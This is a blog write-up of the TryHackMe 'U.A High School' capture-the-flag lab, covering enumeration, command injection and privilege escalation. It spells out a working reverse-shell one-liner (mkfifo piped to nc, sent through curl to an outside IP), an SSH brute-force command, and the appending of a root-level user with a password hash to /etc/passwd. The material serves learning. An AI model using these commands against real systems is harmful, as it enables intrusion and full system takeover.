Challenges: U.A High School (TryHackMe)

Table of contents

This challenge tasked us with testing the security of a web application developed by U.A., the renowned Superhero Academy. The objective was to identify vulnerabilities, gain initial foothold access, escalate privileges, and ultimately retrieve the required flags. To achieve this, we began with network and directory enumeration using tools such as nmap
and gobuster
. This initial phase revealed accessible web endpoints that allowed command execution via the cmd
parameter. Using this entry point, we gained shell access as the www-data
user, discovered hidden files, decoded embedded credentials, and leveraged them to pivot into a user account with SSH access.
Join us in the mission to protect the digital world of superheroes! U.A., the most renowned Superhero Academy, is looking for a superhero to test the security of our new site.
Our site is a reflection of our school values, designed by our engineers with incredible Quirks. We have gone to great lengths to create a secure platform that reflects the exceptional education of the U.A.
Please allow the machine 3 - 5 minutes to fully boot.
Answer the questions below
What is the user.txt flag?
The challenge focused on identifying vulnerabilities in a superhero-themed web application. We began with reconnaissance using
nmap
to scan for open ports andgobuster
to enumerate directories and files. This revealed anindex.php
page under/assets
with acmd
parameter is vulnerable to command injection.nmap -sV IP_Address
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
gobuster dir -u http://IP_Address/assets -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Testing this parameter allowed us to execute commands on the host, including reading /etc/passwd
, which revealed a user named deku
. We attempted to brute force deku
’s SSH credentials using Hydra, but it was unsuccessful. Instead, we exploited the command injection to establish a reverse shell back to our machine using nc
and curl
.
http://IP_Address/assets/index.php?cmd=ls
http://IP_Address/assets/index.php?cmd=cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
deku:x:1000:1000:deku:/home/deku:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
ubuntu:x:1001:1002:Ubuntu:/home/ubuntu:/bin/bash
We had a user called deku who revealed before tried using Hydra and SSH to find the user’s password, but it didn’t work:
hydra -l deku -P /usr/share/wordlists/rockyou.txt ssh://IP_Address
Run these two commands in separate tabs:
nc -lvnp 443
curl -s 'http://IP_Address/assets/index.php' -G --data-urlencode 'cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.250.155 443 >/tmp/f'
Once inside as the www-data
user, we discovered a hidden folder named Hidden_Content
, which contained a passphrase.txt
file encoded in Base64 and an image (oneforall.jpg
) with a corrupted header. After repairing the header using hexedit
, we extracted hidden data using steghide
, which revealed credentials for the deku
account. Using these credentials, we successfully logged in via SSH and located the user.txt
flag.
After running the curl command, check the tab that has nc -lvnp 443
and we get access to www-data
We found a Hidden_Content
folder that had a passphrase.txt
file. We checked the content and decoded the base64 hash
There was a JPG image that we had to fix the header
cp oneforall.jpg fixed.jpg
hexedit fixed.jpg
FF D8 FF E0 00 10 4A 46 49 46
steghide extract -sf fixed.jpg
The passphrase: AllmightForEver!!!
cat creds.txt
The credentials of deku
are now revealed, so we’ll access the user through SSH
ssh deku@IP_Address
find / -type f -name user.txt 2>/dev/null
What is the root.txt flag?
For privilege escalation, we examined
sudo -l
output and identified a script (/opt/NewComponent/
feedback.sh
) that could be run with elevated privileges. Although direct modification of/etc/passwd
was restricted, the script allowed us to append a custom root-level user. By adding our own user entry with UID 0, we escalated to root privileges, located theroot.txt
flag, and completed the challenge.sudo -l
pwd
cat /opt/NewComponent/feedback.sh
sudo /opt/NewComponent/feedback.sh
cat /tmp/test.txt
ls -la /tmp/test.txt
mkpasswd -m md5crypt -s
// need admin permission
nano /etc/passwd
tried to add: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
to /etc/passwd but we only had read-only access
sudo /opt/NewComponent/feedback.sh
copied: jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
tail -n1 /etc/passwd
nano /etc/passwd
confirming that jxf:$1$kuPU0rVy$4lAgUF14dQf/afCWdyITu0:0:0:jxf:/root:/bin/bash
has been added to /etc/passwd
su - jxf
find / -type f -name root.txt 2>/dev/null
cat /root/root.txt
By chaining together web exploitation, reverse shell access, credential discovery, and privilege escalation through a vulnerable script, we successfully retrieved both the user.txt
and root.txt
flags. This exercise demonstrated how multiple small vulnerabilities—such as arbitrary command execution, insecure file permissions, and weak credential management—can be exploited in sequence to compromise a system fully. It reinforced the importance of secure coding, proper file access controls, and credential handling in protecting real-world systems.
Subscribe to my newsletter
Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by

Jebitok
Jebitok
Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.